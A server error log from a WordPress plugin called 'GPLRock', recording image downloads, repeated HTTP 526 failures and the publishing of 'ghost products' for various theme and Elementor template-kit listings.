GPLRock: Image downloaded successfully for product baristar-barista-courses-training-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cf7eb850.jpg [04-Apr-2026 23:01:53 UTC] GPLRock: Using pre-downloaded image for product baristar-barista-courses-training-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cf7eb850.jpg [04-Apr-2026 23:01:53 UTC] GPLRock: Ghost product published with image - Product ID: baristar-barista-courses-training-elementor-template-kit [04-Apr-2026 23:01:54 UTC] GPLRock: Image downloaded successfully for product baretta-paintball-airsoft-club-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d97c2a18.jpg [04-Apr-2026 23:01:54 UTC] GPLRock: Using pre-downloaded image for product baretta-paintball-airsoft-club-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d97c2a18.jpg [04-Apr-2026 23:01:54 UTC] GPLRock: Ghost product published with image - Product ID: baretta-paintball-airsoft-club-elementor-template-kit [04-Apr-2026 23:01:56 UTC] GPLRock: Image downloaded successfully for product barata-fast-food-burger-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-73241c13.webp [04-Apr-2026 23:01:56 UTC] GPLRock: Using pre-downloaded image for product barata-fast-food-burger-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-73241c13.webp [04-Apr-2026 23:01:56 UTC] GPLRock: Ghost product published with image - Product ID: barata-fast-food-burger-elementor-template-kit [04-Apr-2026 23:01:57 UTC] GPLRock: Image downloaded successfully for product banshee-news-magazine-wordpress-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4df4ff7b.webp [04-Apr-2026 23:01:57 UTC] GPLRock: Using pre-downloaded image for product banshee-news-magazine-wordpress-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4df4ff7b.webp [04-Apr-2026 23:01:57 UTC] GPLRock: Ghost product published with image - Product ID: banshee-news-magazine-wordpress-elementor-template-kit [04-Apr-2026 23:01:58 UTC] GPLRock: Image downloaded successfully for product bankai-card-payment-online-banking-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f53c605f.webp [04-Apr-2026 23:01:58 UTC] GPLRock: Using pre-downloaded image for product bankai-card-payment-online-banking-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f53c605f.webp [04-Apr-2026 23:01:58 UTC] GPLRock: Ghost product published with image - Product ID: bankai-card-payment-online-banking-elementor-template-kit [04-Apr-2026 23:02:00 UTC] GPLRock: Image downloaded successfully for product baller-basketball-team-sports-club-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cede709c.jpg [04-Apr-2026 23:02:00 UTC] GPLRock: Using pre-downloaded image for product baller-basketball-team-sports-club-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cede709c.jpg [04-Apr-2026 23:02:00 UTC] GPLRock: Ghost product published with image - Product ID: baller-basketball-team-sports-club-elementor-template-kit [04-Apr-2026 23:02:02 UTC] GPLRock: Image downloaded successfully for product bakery-co-bakery-shop-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-28f465a7.webp [04-Apr-2026 23:02:03 UTC] GPLRock: Using pre-downloaded image for product bakery-co-bakery-shop-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-28f465a7.webp [04-Apr-2026 23:02:03 UTC] GPLRock: Ghost product published with image - Product ID: bakery-co-bakery-shop-elementor-template-kit [04-Apr-2026 23:03:42 UTC] GPLRock: Image download failed for product live-deals-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:03:44 UTC] GPLRock: Image download failed for product live-deals-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:03:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/live-deals-for-woocommerce-7410.webp for product live-deals-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:03:46 UTC] GPLRock: Image download failed for product live-deals-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:03:48 UTC] GPLRock: Image download failed for product live-deals-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:03:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/live-deals-for-woocommerce-7410.webp for product live-deals-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:03:50 UTC] GPLRock WARNING: Image download failed for product live-deals-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/live-deals-for-woocommerce-7410.webp [04-Apr-2026 23:03:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: live-deals-for-woocommerce [04-Apr-2026 23:03:51 UTC] GPLRock: Image download failed for product resido-laravel-real-estate-multilingual-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:03:53 UTC] GPLRock: Image download failed for product resido-laravel-real-estate-multilingual-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:03:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/resido---laravel-real-estate-multilingual-system-2672.webp for product resido-laravel-real-estate-multilingual-system after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:03:55 UTC] GPLRock: Image download failed for product resido-laravel-real-estate-multilingual-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:03:57 UTC] GPLRock: Image download failed for product resido-laravel-real-estate-multilingual-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:03:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/resido---laravel-real-estate-multilingual-system-2672.webp for product resido-laravel-real-estate-multilingual-system after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:03:59 UTC] GPLRock WARNING: Image download failed for product resido-laravel-real-estate-multilingual-system. URL: https://meldwp.com/wp-content/uploads/resido---laravel-real-estate-multilingual-system-2672.webp [04-Apr-2026 23:03:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: resido-laravel-real-estate-multilingual-system [04-Apr-2026 23:03:59 UTC] GPLRock: Image download failed for product helpful-article-feedback-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:04:01 UTC] GPLRock: Image download failed for product helpful-article-feedback-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:13:59 UTC] GPLRock: Image download failed for product hostix-hosting-whmcs-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:14:01 UTC] GPLRock: Image download failed for product hostix-hosting-whmcs-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:14:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hostix---hosting-whmcs-wordpress-theme-11209.webp for product hostix-hosting-whmcs-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:14:03 UTC] GPLRock: Image download failed for product hostix-hosting-whmcs-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:14:05 UTC] GPLRock: Image download failed for product hostix-hosting-whmcs-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:14:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hostix---hosting-whmcs-wordpress-theme-11209.webp for product hostix-hosting-whmcs-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:14:07 UTC] GPLRock WARNING: Image download failed for product hostix-hosting-whmcs-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/hostix---hosting-whmcs-wordpress-theme-11209.webp [04-Apr-2026 23:14:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hostix-hosting-whmcs-wordpress-theme [04-Apr-2026 23:14:08 UTC] GPLRock: Image downloaded successfully for product rebytes-electronics-repair-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-31b39477.webp [04-Apr-2026 23:14:08 UTC] GPLRock: Using pre-downloaded image for product rebytes-electronics-repair-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-31b39477.webp [04-Apr-2026 23:14:08 UTC] GPLRock: Ghost product published with image - Product ID: rebytes-electronics-repair-wordpress-theme [04-Apr-2026 23:14:08 UTC] GPLRock: Image download failed for product phonerepair-mobile-device-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:14:10 UTC] GPLRock: Image download failed for product phonerepair-mobile-device-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:14:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/phonerepair---mobile-device-shop-wordpress-theme-11167.webp for product phonerepair-mobile-device-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:14:12 UTC] GPLRock: Image download failed for product phonerepair-mobile-device-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:14:14 UTC] GPLRock: Image download failed for product phonerepair-mobile-device-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:14:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/phonerepair---mobile-device-shop-wordpress-theme-11167.webp for product phonerepair-mobile-device-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:14:16 UTC] GPLRock WARNING: Image download failed for product phonerepair-mobile-device-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/phonerepair---mobile-device-shop-wordpress-theme-11167.webp [04-Apr-2026 23:14:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: phonerepair-mobile-device-shop-wordpress-theme [04-Apr-2026 23:14:16 UTC] GPLRock: Image download failed for product hexadash-tailwind-react-vue-angular-svelte-laravel-nodejs-django-html-dashboard-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:14:18 UTC] GPLRock: Image download failed for product hexadash-tailwind-react-vue-angular-svelte-laravel-nodejs-django-html-dashboard-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:14:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hexadash--tailwind-react-vue-angular-svelte-laravel-nodejs-django--html-dashboar-26200.webp for product hexadash-tailwind-react-vue-angular-svelte-laravel-nodejs-django-html-dashboard-template after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:14:21 UTC] GPLRock: Image download failed for product hexadash-tailwind-react-vue-angular-svelte-laravel-nodejs-django-html-dashboard-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:14:23 UTC] GPLRock: Image download failed for product hexadash-tailwind-react-vue-angular-svelte-laravel-nodejs-django-html-dashboard-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:14:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hexadash--tailwind-react-vue-angular-svelte-laravel-nodejs-django--html-dashboar-26200.webp for product hexadash-tailwind-react-vue-angular-svelte-laravel-nodejs-django-html-dashboard-template after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:14:25 UTC] GPLRock WARNING: Image download failed for product hexadash-tailwind-react-vue-angular-svelte-laravel-nodejs-django-html-dashboard-template. URL: https://meldwp.com/wp-content/uploads/hexadash--tailwind-react-vue-angular-svelte-laravel-nodejs-django--html-dashboar-26200.webp [04-Apr-2026 23:14:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hexadash-tailwind-react-vue-angular-svelte-laravel-nodejs-django-html-dashboard-template [04-Apr-2026 23:14:25 UTC] GPLRock: Image download failed for product braise-recipe-food-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:14:27 UTC] GPLRock: Image download failed for product braise-recipe-food-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:14:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/braise---recipe--food-blog-wordpress-theme-10995.webp for product braise-recipe-food-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:14:30 UTC] GPLRock: Image download failed for product braise-recipe-food-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:14:32 UTC] GPLRock: Image download failed for product braise-recipe-food-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:14:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/braise---recipe--food-blog-wordpress-theme-10995.webp for product braise-recipe-food-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:14:34 UTC] GPLRock WARNING: Image download failed for product braise-recipe-food-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/braise---recipe--food-blog-wordpress-theme-10995.webp [04-Apr-2026 23:14:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: braise-recipe-food-blog-wordpress-theme [04-Apr-2026 23:14:34 UTC] GPLRock: Image download failed for product culturepress-art-culture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:14:36 UTC] GPLRock: Image download failed for product culturepress-art-culture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:14:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/culturepress---art--culture-wordpress-theme-23435.webp for product culturepress-art-culture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:14:39 UTC] GPLRock: Image download failed for product culturepress-art-culture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:14:41 UTC] GPLRock: Image download failed for product culturepress-art-culture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:14:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/culturepress---art--culture-wordpress-theme-23435.webp for product culturepress-art-culture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:14:43 UTC] GPLRock WARNING: Image download failed for product culturepress-art-culture-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/culturepress---art--culture-wordpress-theme-23435.webp [04-Apr-2026 23:14:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: culturepress-art-culture-wordpress-theme [04-Apr-2026 23:14:43 UTC] GPLRock: Image download failed for product realacre-real-estate-property-fse-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:14:45 UTC] GPLRock: Image download failed for product realacre-real-estate-property-fse-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:14:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/realacre--real-estate--property-fse-wordpress-theme-23203.webp for product realacre-real-estate-property-fse-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:14:48 UTC] GPLRock: Image download failed for product realacre-real-estate-property-fse-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:14:50 UTC] GPLRock: Image download failed for product realacre-real-estate-property-fse-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:14:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/realacre--real-estate--property-fse-wordpress-theme-23203.webp for product realacre-real-estate-property-fse-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:14:52 UTC] GPLRock WARNING: Image download failed for product realacre-real-estate-property-fse-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/realacre--real-estate--property-fse-wordpress-theme-23203.webp [04-Apr-2026 23:14:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: realacre-real-estate-property-fse-wordpress-theme [04-Apr-2026 23:14:52 UTC] GPLRock: Image download failed for product lovus-wedding-planner-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:14:54 UTC] GPLRock: Image download failed for product lovus-wedding-planner-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:14:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lovus---wedding-planner-wordpress-theme-8436.webp for product lovus-wedding-planner-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:14:56 UTC] GPLRock: Image download failed for product lovus-wedding-planner-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:14:58 UTC] GPLRock: Image download failed for product lovus-wedding-planner-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:15:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lovus---wedding-planner-wordpress-theme-8436.webp for product lovus-wedding-planner-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:15:00 UTC] GPLRock WARNING: Image download failed for product lovus-wedding-planner-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/lovus---wedding-planner-wordpress-theme-8436.webp [04-Apr-2026 23:15:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lovus-wedding-planner-wordpress-theme [04-Apr-2026 23:15:01 UTC] GPLRock: Image download failed for product soluris-ecology-solar-energy-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:15:03 UTC] GPLRock: Image download failed for product soluris-ecology-solar-energy-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:15:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/soluris---ecology--solar-energy-wordpress-theme-21481.webp for product soluris-ecology-solar-energy-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:15:05 UTC] GPLRock: Image download failed for product soluris-ecology-solar-energy-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:15:07 UTC] GPLRock: Image download failed for product soluris-ecology-solar-energy-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:15:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/soluris---ecology--solar-energy-wordpress-theme-21481.webp for product soluris-ecology-solar-energy-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:15:09 UTC] GPLRock WARNING: Image download failed for product soluris-ecology-solar-energy-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/soluris---ecology--solar-energy-wordpress-theme-21481.webp [04-Apr-2026 23:15:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: soluris-ecology-solar-energy-wordpress-theme [04-Apr-2026 23:15:09 UTC] GPLRock: Image download failed for product amy-creative-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:15:11 UTC] GPLRock: Image download failed for product amy-creative-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:15:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/amy---creative-multi-purpose-wordpress-theme-16336.webp for product amy-creative-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:15:14 UTC] GPLRock: Image download failed for product amy-creative-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:15:16 UTC] GPLRock: Image download failed for product amy-creative-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:15:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/amy---creative-multi-purpose-wordpress-theme-16336.webp for product amy-creative-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:15:18 UTC] GPLRock WARNING: Image download failed for product amy-creative-multi-purpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/amy---creative-multi-purpose-wordpress-theme-16336.webp [04-Apr-2026 23:15:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: amy-creative-multi-purpose-wordpress-theme [04-Apr-2026 23:15:59 UTC] GPLRock: Image downloaded successfully for product cofery-restaurant-cafe-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2a9616dd.webp [04-Apr-2026 23:15:59 UTC] GPLRock: Using pre-downloaded image for product cofery-restaurant-cafe-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2a9616dd.webp [04-Apr-2026 23:15:59 UTC] GPLRock: Ghost product published with image - Product ID: cofery-restaurant-cafe-elementor-template-kit [04-Apr-2026 23:16:01 UTC] GPLRock: Image downloaded successfully for product clino-cleaning-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5e12fb3d.jpg [04-Apr-2026 23:16:01 UTC] GPLRock: Using pre-downloaded image for product clino-cleaning-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5e12fb3d.jpg [04-Apr-2026 23:16:01 UTC] GPLRock: Ghost product published with image - Product ID: clino-cleaning-business-elementor-template-kit [04-Apr-2026 23:16:02 UTC] GPLRock: Image downloaded successfully for product clinik-hospital-clinical-health-care-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-56d82f14.webp [04-Apr-2026 23:16:02 UTC] GPLRock: Using pre-downloaded image for product clinik-hospital-clinical-health-care-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-56d82f14.webp [04-Apr-2026 23:16:02 UTC] GPLRock: Ghost product published with image - Product ID: clinik-hospital-clinical-health-care-elementor-template-kit [04-Apr-2026 23:16:04 UTC] GPLRock: Image downloaded successfully for product claire-personal-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b30d7864.webp [04-Apr-2026 23:16:04 UTC] GPLRock: Using pre-downloaded image for product claire-personal-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b30d7864.webp [04-Apr-2026 23:16:04 UTC] GPLRock: Ghost product published with image - Product ID: claire-personal-portfolio-elementor-template-kit [04-Apr-2026 23:16:05 UTC] GPLRock: Image downloaded successfully for product ck-lawyer-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-380c6015.webp [04-Apr-2026 23:16:05 UTC] GPLRock: Using pre-downloaded image for product ck-lawyer-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-380c6015.webp [04-Apr-2026 23:16:05 UTC] GPLRock: Ghost product published with image - Product ID: ck-lawyer-template-kit [04-Apr-2026 23:16:07 UTC] GPLRock: Image downloaded successfully for product civlo-lawyer-law-office-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d191803f.webp [04-Apr-2026 23:16:07 UTC] GPLRock: Using pre-downloaded image for product civlo-lawyer-law-office-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d191803f.webp [04-Apr-2026 23:16:07 UTC] GPLRock: Ghost product published with image - Product ID: civlo-lawyer-law-office-elementor-template-kit [04-Apr-2026 23:16:09 UTC] GPLRock: Image downloaded successfully for product cityvile-city-government-municipal-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f50d1164.jpg [04-Apr-2026 23:16:09 UTC] GPLRock: Using pre-downloaded image for product cityvile-city-government-municipal-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f50d1164.jpg [04-Apr-2026 23:16:09 UTC] GPLRock: Ghost product published with image - Product ID: cityvile-city-government-municipal-elementor-template-kit [04-Apr-2026 23:16:10 UTC] GPLRock: Image downloaded successfully for product citala-swimming-pool-maintenance-company-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-78942047.webp [04-Apr-2026 23:16:10 UTC] GPLRock: Using pre-downloaded image for product citala-swimming-pool-maintenance-company-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-78942047.webp [04-Apr-2026 23:16:10 UTC] GPLRock: Ghost product published with image - Product ID: citala-swimming-pool-maintenance-company-elementor-template-kit [04-Apr-2026 23:16:12 UTC] GPLRock: Image downloaded successfully for product cinomy-movie-tv-streaming-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5ecb2bb8.jpg [04-Apr-2026 23:16:12 UTC] GPLRock: Using pre-downloaded image for product cinomy-movie-tv-streaming-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5ecb2bb8.jpg [04-Apr-2026 23:16:12 UTC] GPLRock: Ghost product published with image - Product ID: cinomy-movie-tv-streaming-services-elementor-template-kit [04-Apr-2026 23:16:14 UTC] GPLRock: Image downloaded successfully for product chooper-custom-motorcycle-garage-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-46042363.jpg [04-Apr-2026 23:16:14 UTC] GPLRock: Using pre-downloaded image for product chooper-custom-motorcycle-garage-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-46042363.jpg [04-Apr-2026 23:16:14 UTC] GPLRock: Ghost product published with image - Product ID: chooper-custom-motorcycle-garage-elementor-template-kit [04-Apr-2026 23:19:00 UTC] GPLRock: Image downloaded successfully for product dydeux-personal-cv-elementor-pro-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-03149adf.jpg [04-Apr-2026 23:19:00 UTC] GPLRock: Using pre-downloaded image for product dydeux-personal-cv-elementor-pro-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-03149adf.jpg [04-Apr-2026 23:19:00 UTC] GPLRock: Ghost product published with image - Product ID: dydeux-personal-cv-elementor-pro-template-kit [04-Apr-2026 23:19:02 UTC] GPLRock: Image downloaded successfully for product dicor-concrete-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8c5a043d.jpg [04-Apr-2026 23:19:02 UTC] GPLRock: Using pre-downloaded image for product dicor-concrete-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8c5a043d.jpg [04-Apr-2026 23:19:02 UTC] GPLRock: Ghost product published with image - Product ID: dicor-concrete-service-elementor-template-kit [04-Apr-2026 23:19:04 UTC] GPLRock: Image downloaded successfully for product crevia-craft-handmade-creations-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e8b72507.jpg [04-Apr-2026 23:19:04 UTC] GPLRock: Using pre-downloaded image for product crevia-craft-handmade-creations-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e8b72507.jpg [04-Apr-2026 23:19:04 UTC] GPLRock: Ghost product published with image - Product ID: crevia-craft-handmade-creations-elementor-template-kit [04-Apr-2026 23:19:05 UTC] GPLRock: Image downloaded successfully for product carshen-car-detailing-service-car-repair-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-32bf7b25.jpg [04-Apr-2026 23:19:05 UTC] GPLRock: Using pre-downloaded image for product carshen-car-detailing-service-car-repair-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-32bf7b25.jpg [04-Apr-2026 23:19:05 UTC] GPLRock: Ghost product published with image - Product ID: carshen-car-detailing-service-car-repair-elementor-template-kit [04-Apr-2026 23:19:07 UTC] GPLRock: Image downloaded successfully for product bluehope-whale-marine-conservation-elementor-template-kit (attempt 1) to: 